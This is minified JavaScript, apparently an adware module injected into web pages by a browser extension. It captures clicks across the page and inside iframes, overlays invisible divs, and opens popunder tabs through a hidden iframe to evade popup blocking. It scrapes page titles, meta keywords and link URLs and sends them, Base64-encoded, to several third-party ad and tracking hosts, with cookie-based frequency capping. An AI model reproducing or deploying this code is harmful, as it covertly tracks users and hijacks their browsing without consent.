_GPL.j(function(g,c,ma,u,m,f,l,za,Aa,tb,na,v,db,oa,t,ub,n,Ba,Z,Ca,E,w,vb,x,eb,W){function I(){Da(h,Z,I);fb(function(a,b){d=a;aa||(aa=!0,gb(),hb(),pa(),Ea(h,Z,pa),Fa=oa(function(){36E5<+new m-Ga&&O(!1)},5E3))})}function pa(){Ga=+new m}function O(a){aa&&(g("iframe").off("mouseover",Ha),P.remove(),aa=!1,ma(Fa),ib(),Da(h,Z,pa),d=void 0,J=y="",a||Ea(h,Z,I),t(I,1E3*Math.max(F,z)))}function Ea(a,b,e){if(n[Ba])a[Ba](b,e,!1);else a.attachEvent("on"+b,e)}function hb(){ba=!0;c.ah&&c.ah(G,Q);g("*").add(n).on(G,
Q);Ia||(Ia=!0,g("*").add(n).on("mousedown mouseup click",Ja));g("iframe").each(function(a,b){try{g(b.contentWindow).on(G,Q)}catch(e){}});Ka=oa(function(){g("iframe").each(function(a,b){b[La]||(b[La]=1,g(b).mouseover(Ha))})},100);if(X)try{c.log("Attempting to pop from extension to: "+d);var a="ld893_";y&&(a+="_"+f(y),J&&(a+=","+J),a+="_");var a=a+("_"+H()),b=c.proto+c.baseCDN+"/pwn.html?u="+f(d)+"&n="+a+"&r=";"h"!=X||R?"w"!=X||R||(R=!0,qa(n,"openThatTabBitch",{url:b,isUnder:!1,attr:"z7b85_91c4"}),
t(function(){R=!1},100)):(R=!0,qa(h,"createNewTab",{url:b,focused:"true"}),qa(h.documentElement,"createNewTab",{url:b,focused:"true"}),t(function(){R=!1},100));var e=oa(function(){h.documentElement.getAttribute("z7b85_91c4")&&(ma(e),O(!0),Ma(),h.documentElement.removeAttribute("z7b85_91c4"))},50)}catch(A){}}function qa(a,b,e){if(h.createEvent){var A=h.createEvent("CustomEvent");A.initCustomEvent(b,!1,!1,e);a.dispatchEvent(A)}else A=h.createEventObject(),A.detail=e,A.realType=b,a.fireEvent("ondataavailable",
A)}function K(a){a=na.userAgent.match(db(a+"[/ ](\\d+)","i"));return(a&&a[1])|0}function jb(){if(K("Chrome")){for(var a=0;a<na.plugins.length;a++)if("Widevine Content Decryption Module"==na.plugins[a].name)return!1;return!0}return!1}function gb(){P||(P=g('<div style="z-index:999999999999999;cursor:pointer;display:none;position:absolute;background:transparent;">&nbsp;</div>').appendTo("body"),P.mouseout(function(){P.hide()}))}function Ha(a){var b=g(a.target),e=b.offset();e.width=b.outerWidth();e.height=
b.outerHeight();e.display="block";P.css(e);a.stopPropagation()}function kb(a){if(d!=Na){a=a.target||a.srcElement;for(var b="";a;){S||(S=a.tagName);if("A"==a.tagName&&a.href&&a.protocol.toLowerCase().match(/^http/)){b=a.protocol+"//"+a.host+a.pathname+a.search+a.hash;break}a=a.parentNode}if(!d)return!1;b&&(d+="&t="+f(b.substring(0,Math.max(0,1500-d.length))));d+="&rt="+(+new m-Oa);S&&(d+="&data_tag="+f(S));"/"!=l.pathname&&(d+="&mk="+f(c.B64.encode(ra().substring(0,Math.max(0,1500-d.length)))));d+=
Pa?"&data_sid="+f(Pa):""}c.log("Popping to: "+d);a="ld893_";y&&(a+="_"+f(y),J&&(a+=","+J),a+="_");b=a+="_"+H();T.parentNode||(Qa=Ra());if(a=Qa("",1749==p?b:"_blank"))a.name=b,0.02>Math.random()?(b=""+d,-1<d.indexOf(ca)&&(b="http://"+ca+"/pclk?c="+f(y)+"&crl="+f(d)),a.location.href=b):a.location.href=d;return a}function ra(){function a(a){return a.toLowerCase().replace(/[.,!?]/g," ").split(" ")}var b=[];g("title").length&&(b=b.concat(a(g("title").text())));g('meta[property="og:title"],meta[property="og:description"],meta[name="description"],meta[name="keywords"]').each(function(){var e=
g.trim(g(this).attr("content"));e&&e.match(/^\s*[a-zA-Z0-9]/)&&(b=b.concat(a(e)))});return g.trim(function(a){var b=[];g.each(a,function(a,e){-1==g.inArray(e,b)&&b.push(e)});return b}(b).join(",").replace(/([,]+)/g,",").replace(/\s+/g," "))}function Sa(a,b){a=(a||l.href).substr(0,1500);var e="/"!=l.pathname?ra():"";a=a.replace(/:/g,"%3A");var e=e.replace(/:/g,"%3A").substring(0,Math.max(0,1500-a.length)),A=c.getSubId?"&subid="+c.getSubId(da):"",e=f(c.B64.encode(a+"::z-"+p+"-"+Ta+"::"+e)),d="&cb="+
(b||sa),d=d+("&data_fr="+(Ua(B)?"false":"true")),d=d+("&data_proto="+f(l.protocol));return c.proto+ca+(C?"/dpops":"/pops")+"?c="+e+"&a=1&ch="+f(Y)+A+d}function Da(a,b,e){if(n[Ca])a[Ca](b,e,!1);else a.detachEvent("on"+b,e)}function ib(){ba=!1;c.rh&&c.rh(G,Q);g("*").add(n).off(G,Q);g("iframe").each(function(a,b){try{g(b.contentWindow).off(G,Q)}catch(e){}});ma(Ka)}function lb(a){a=a||n.event||{};if(X&&h.documentElement.getAttribute("z7b85_91c4"))return!0;for(a=a.target||a.srcElement;a;){if(a["91c4"])return!0;
a=a.parentNode}return!1}function mb(a,b){var e=0,c;b=b||[];for(var f=Math.random(),d=0;d<b.length;d++)if(e+=b[d][1],f<e&&!c&&(c=b[d][0]),b[d][0]==a){c=a;break}return c||b[0][0]}function U(a,b){a=v(a,10);isNaN(a)&&(a=v(ea&&ea.getItem(b)||c.gc(b,10),10)||0);return a}function Ua(a){return(new m(1E3*(a||0))).toDateString()==(new m).toDateString()}function fa(){B|=0;r|=0;L|=0;var a=H(),b=r&&!Ua(B);b&&(r=0,s.set(x,r));var e=!M||a-B>=F&&r<M,a=a-L>=z;return!k&&b||e&&a}function Q(a){a=a||n.event;if(!lb(a)){var b=
ba&&(C||nb()),e=b&&kb(a);if(e&&!e.closed)return O(!0),Ma(),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_success&d="+f(c.gd())+"&xr="+(k?"1":"0")+"&cid="+c.vars.cid+"&pid="+p+"&r="+999999999*Math.random(),ga&&u(ga),ha&&u(ha),ta=!0,Ja(a);e&&e.closed?ha||(ha=t(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popclose&u="+f(d)+"&location="+f(l.hostname)+"&pid="+p+"&tag="+f(S||"")+"&r="+999999999*Math.random()},1E3)):b&&(ga||(ga=t(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfail&u="+
f(d)+"&location="+f(l.hostname)+"&pid="+p+"&tag="+f(S||"")+"&r="+999999999*Math.random()},1E3)))}}function nb(){if(!s.swf)return!0;B=U(s.get(E),E);316808>Va.score&&(r=U(s.get(x),x));var a=Wa(s.get(w));L=U(a[V],w);return fa()}function H(){return za(new m/1E3)}function Xa(a,b,e){s.set(a,e);e=H();ea&&ea.setItem(a,e);b=v(b,10);var c=new m;c.setSeconds(c.getSeconds()+b);h.cookie=a+"="+e+";expires="+c.toUTCString()+";path=/;domain="+V}function Ma(){var a=H();Xa(E,F,a);s.set(eb,a);B=a;s.set(x,++r);z&&Xa(w,
z,ia+(ia&&",")+V+":"+a)}function Wa(a){var b={},e=H(),c=[];a=(a||"").split(",");if(a.length){for(var d=0;d<a.length;++d){var f=a[d].split(":"),g=v(f[1],10);e-g<z&&(b[f[0]]=g,c.push(f[0]+":"+g))}ia=c.join(",");s.set(w,ia)}return b}function ua(){return C||fa()||k?1:H()-(v(L,10)||0)<z?Infinity:r>=M?"US"==c.vars.cid?149058:-1<["CA","GB","AU","FR","IT"].indexOf(c.vars.cid)?88620:59858:"US"==c.vars.cid?47432:-1<["CA","GB","AU","FR","IT"].indexOf(c.vars.cid)?59858:49928}function ob(a){"US"==c.vars.cid?va(a,
47432,149058):-1<["CA","GB","AU","FR","IT"].indexOf(c.vars.cid)?va(a,59858,88620):va(a,49928,59858);return fa()}function va(a,b,e){a>=b&&(F=0,a>=e&&r>=M&&(r=Aa(0,M-1)))}function Ya(a){u(ja);if(!k&&1735!=p){var b=ua(),e="http://clkmon.com/adServe/banners?pid=14442&cid="+Ta+"&action=r&q=",c="/"!=l.pathname?ra():"",e=e+f(c.substring(0,Math.max(0,1500-e.length)));n[sa]({url:e,score:b});(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfallback&reason="+f(a)+"&pid="+p+"&u="+f(l.hostname)+"&r="+999999999*
Math.random()}}function fb(a){!function e(){s.get(["frt","_GPL_oo_z7b85",E,w,x,W],function(d){if(d.v.frt){if("1750"==p){var g=v(d.v._GPL_oo_z7b85,10)||0;if(86400>za(new m/1E3)-g)return}Za.getAttribute("data-openThatTabBitch")&&"t3"==c.vars.wptg&&(g=["wp_t3_c","wp_t3_t"],q=d.v[W],q&&-1!=g.indexOf(q)||(q=g[Math.floor(Math.random()*g.length)],s.set(W,q)),"wp_t3_t"==q&&(X="w"));q||(q=d.v[W],q=mb(q,[["20150723_c",0.95],["20150723_t",0.05]]),s.set(W,q));"20150723_t"==q&&(C=!0);$a||($a=!0,c.pc(function(){ab?
ab=!1:ba||(wa=!1,O(),I())}));n[sa]=function(c){pb(c,a)};g=H();B=U(d.v[E],E);r=U(d.v[x],x);d=Wa(d.v[w]);L=U(d[V],w);if(C||fa()){d=ua();xa=+new m;var l=h.createElement("script");l.src=Sa()+"&ms="+d+"&r="+g;l.onerror=function(){Ya("error")};Za.appendChild(l);(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_req&ms="+d+"&d="+f(c.gd())+"&xr="+(k?"1":"0")+"&cid="+c.vars.cid+"&pid="+p+"&r="+999999999*Math.random();u(ja);ja=t(function(){Ya("time")},15E3)}else d=ua(),c.log("minScoreNeeded: "+d),Infinity>
d&&!wa&&!k&&(xa=+new m,c.insertJS(Sa()+"&ms="+d+"&r="+g),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_req&ms="+d+"&d="+f(c.gd())+"&xr="+(k?"1":"0")+"&cid="+c.vars.cid+"&pid="+p+"&r="+999999999*Math.random(),wa=!0),C||(u(ya),ya=t(e,1E3*(5+Aa(g,B+F,L+z)-g)))}})}()}function Ra(){T=h.createElement("iframe");T.style.display="none";T.style.visibility="hidden";h.body.appendChild(T);return T.contentWindow.open}function Ja(a){if(ta)return a.cancelBubble=!0,a.stopPropagation&&a.stopPropagation(),a.stopImmediatePropagation&&
a.stopImmediatePropagation(),a.preventDefault&&a.preventDefault(),t(function(){ta=!1},100),!1}function ka(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_nobid&d="+f(c.gd())+"&xr="+(k?"1":"0")+"&cid="+c.vars.cid+"&pid="+p+"&r="+999999999*Math.random()}function pb(a,b){u(ja);var e=+new m-xa;J=y="";if(a){if(C){if(!a.url&&!a.retry){if(k){ka();return}a.retry=F}if(a.retry){u(la);la=t(function(){O(!0);I()},1E3*v(a.retry+1,10));ka();return}}a.crid&&(J=a.crid);if(C&&a.url&&!a.cid){var d=a.url.match(/[?&]c=([^&]+)/);
d&&d[1]&&(a.cid=d[1])}a.cid&&(y=a.cid,a.url||(a.url="http://"+ca+"/click?c="+f(y)));a.url&&(a.url+=c.getSubId?"&subid="+c.getSubId(da):"",a.url+=q?"&data_test="+f(q):"",a.url+="&data_fb="+(jb()?"yes":"no"),a.url+="&data_rtt="+e,a.url+="&data_proto="+f(l.protocol),a.url+="&data_ic="+(bb?"true":"false"),a.url+="&data_ss="+(screen.availHeight||0)+"x"+(screen.availWidth||0));k&&!a.url&&(a.url=Na,a.cid="xr");e=v(a.score,10);d=(d=!a.mp)&&(C||0<e&&ob(e));k||d?(Oa=+new m,u(ya),a.url&&a.expires&&(u(la),la=
t(function(){O(!0);I()},1E3*v(a.expires,10))),Va={score:e,now:new m/1},b(a.url,e),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_bid&d="+f(c.gd())+"&xr="+(k?"1":"0")+"&cid="+c.vars.cid+"&pid="+p+"&r="+999999999*Math.random()):ka()}else ka()}var s=c.items.e6a00,h=n.document,Za=h.body,ea=n.localStorage,qb=K("chrome"),rb=K("firefox");K("opera");var sb=K("safari");K("webkit");var Y=c.item_vars["22555_ch"]||c.item_vars.ch||"",F,B,L,N=c.dt(),N=N&&N.inherited&&N.inherited.t||[],k="x"==Y||-1<N.indexOf("adult")||
0==N.length&&0<g('meta[content="RTA-5042-1996-1400-1577-RTA"]').length;k&&(-1==N.indexOf("adult_block")?Y="x":(Y="x-issue",k=!1));var z,da="z7b85",ca=c.gsd&&c.gsd(da)||"s.hklmm.com",aa=!1,Fa,Ga,ba=!1,V=c.gd(),d,Oa=0,xa=0,la,ia="",r=0,M,Va={},y="",J="",ya,wa=!1,q,ga,ha,ja,S,G="click";if(qb||sb)G="mousedown";else if(rb||h.all||K("trident"))G="mouseup";var cb=c.zoneid(da,!0).split("_"),Ta=cb[0],p=cb[1]||c.vars.pid,Pa=c.vars.systemid,Na="http://secure.xsrving.com/display?size=800x600&ch="+f(Y)+"&referer="+
f(V),X=!1,R=!1,sa=c.rs(20),P,La=c.rs(12),Ka,bb=function(){try{return n[(n.btoa||function(a){return a})(l.hostname+"::"+(new m).toDateString())]===l.protocol}catch(a){return!1}}(),$a=!1,ab=!0,T,Qa=Ra(),ta=!1,Ia=!1,C=!1;1797==p&&"GB"==c.vars.cid||"facebook.com"==V||(bb?(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=idlecrawler&d="+f(c.gd())+"&xr="+(k?"1":"0")+"&cid="+c.vars.cid+"&pid="+p+"&r="+999999999*Math.random():(k?(M=F=0,z=180,E+="_xr",w+="_xr",x+="_xr"):(F=360,M=4,z=360),I()))},_GPL,clearInterval,
clearTimeout,Date,encodeURIComponent,location,Math.floor,Math.max,Math.random,navigator,parseInt,RegExp,setInterval,setTimeout,void 0,window,"addEventListener","mousemove","removeEventListener","ld893_pop_g","ld893_pop_s","ld893_s","ld893_pop_gs","ld893_spopd","z7b85_test");
